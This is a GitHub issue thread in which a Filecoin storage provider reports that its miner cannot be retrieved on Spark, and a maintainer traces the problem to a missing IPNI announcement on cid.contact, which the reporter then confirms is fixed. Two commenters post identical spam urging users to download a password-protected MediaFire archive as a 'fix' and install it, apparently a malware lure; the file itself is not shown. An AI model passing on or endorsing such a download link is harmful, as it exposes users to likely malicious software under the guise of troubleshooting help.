### ISSUE TITLE
f03174685 cannot be retrieved on spark

### ISSUE THREAD

**Issue by nicelove666** [filecoin-station/spark#91]
f03174685 cannot be retrieved on spark
We checked and found that there is no problem with the configuration of sp. Boost retrieval is also supported. 
Hope to get help.

boost retrieve -p=f03174685 --o=f03174685_ret.car bafykbzaceb566mobfwditzrrqguajmt2qvpa3vluemakll25bvjeothyrksrw
<img width="568" alt="WechatIMG23429" src="https://github.com/user-attachments/assets/a97e4119-a191-4837-a310-64364dd770df">
<img width="769" alt="WechatIMG23425" src="https://github.com/user-attachments/assets/3fc2bf6e-f2aa-4c11-a4ec-204e3177d378">
<img width="866" alt="WechatIMG23427" src="https://github.com/user-attachments/assets/a07f78c7-ceda-42cf-b423-c6bdb788085c">
<img width="881" alt="WechatIMG23426" src="https://github.com/user-attachments/assets/8d57233c-1cf0-48ab-9da4-c32f45e73da4">

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bajtos** [comment]
Hi, could you please try the two troubleshooting tools documented in https://docs.filspark.com/troubleshooting-miner-score?

I suspect there is a problem with your IPNI announcement configuration. When I look at https://cid.contact/providers, I don't see any entry with ID `12D3KoWDZdWHyQBEgW9A08cgpJgDgGQu2MqCdw6iJ3d2em7mDfB` in the list of providers known by cid.contact.

When I ask Filecoin RPC API about the peer ID of the miner `f03174685`, I get back `12D3KooWDZdWHyQBEgW9Ao8cgpJgDgGQu2MqCdw6iJ3d2em7mDfB`. This ID is not listed by https://cid.contact/providers either.

**Comment by nicelove666** [comment]
Hi, thanks for your help and reminder.
It looks like it has appeared on cid.contact.I believe we will see the data on spark soon.
Thanks for your hard work.Have a nice day.
